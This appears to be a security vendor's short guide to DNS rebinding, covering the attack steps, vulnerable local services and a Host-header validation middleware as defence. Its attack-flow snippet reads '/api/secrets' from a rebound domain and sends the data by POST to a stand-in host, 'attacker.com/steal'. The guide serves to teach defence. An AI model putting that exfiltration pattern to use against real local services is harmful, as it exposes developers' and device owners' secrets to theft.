DNS Rebinding Explained

January 20266 min readVulnerability Guides
Share

TL;DR

DNS rebinding tricks browsers into thinking a malicious site and your local service are the same origin. The attacker's domain initially resolves to their server, then rebinds to localhost. This bypasses same-origin policy, letting attackers access local services. Protect by validating the Host header.

How DNS Rebinding Works

  1. Attacker controls evil.com which resolves to 1.2.3.4 (their server)
  2. Victim visits evil.com, browser loads JavaScript
  3. Attacker changes DNS to resolve evil.com to 127.0.0.1
  4. JavaScript makes request to evil.com (now 127.0.0.1)
  5. Browser thinks it is same-origin, allows the request
  6. Attacker's script can now access local services
Attack flow
// Initial: evil.com -> 1.2.3.4 (attacker's server)
// Victim visits https://evil.com
// Attacker's JavaScript loads...

// After DNS rebind: evil.com -> 127.0.0.1
fetch('http://evil.com:8080/api/secrets')
  // Browser resolves evil.com to 127.0.0.1
  // Reaches local development server!
  // Same-origin policy doesn't block it
  .then(r => r.json())
  .then(data => {
    // Exfiltrate data to attacker's server
    fetch('https://attacker.com/steal', {
      method: 'POST',
      body: JSON.stringify(data)
    });
  });

Who Is Vulnerable

  • Development servers (localhost:3000, etc.)
  • IoT devices and smart home hubs
  • Database admin tools
  • Docker management interfaces
  • Any service binding to all interfaces (0.0.0.0)

How to Prevent DNS Rebinding

Validate Host header
app.use((req, res, next) => {
  const allowedHosts = ['localhost', '127.0.0.1', 'myapp.local'];
  const host = req.headers.host?.split(':')[0];

  if (!allowedHosts.includes(host)) {
    return res.status(403).send('Invalid host');
  }
  next();
});

Does HTTPS prevent DNS rebinding?

Partially. The attacker cannot get a valid certificate for localhost, so HTTPS services are safer. But HTTP services (common in development) are fully vulnerable.

How does this relate to SSRF?

DNS rebinding is client-side (browser-based), while SSRF is server-side. DNS rebinding abuses the victim's browser to reach local services, SSRF abuses the server itself.

Related Articles

SSRF Explained

Server-side version

Subdomain Takeover

Another DNS attack

CORS Misconfiguration

Cross-origin issues

Secure Your Services

Our scanner identifies services vulnerable to DNS rebinding.

Start Free Scan
Vulnerability Guides

DNS Rebinding Explained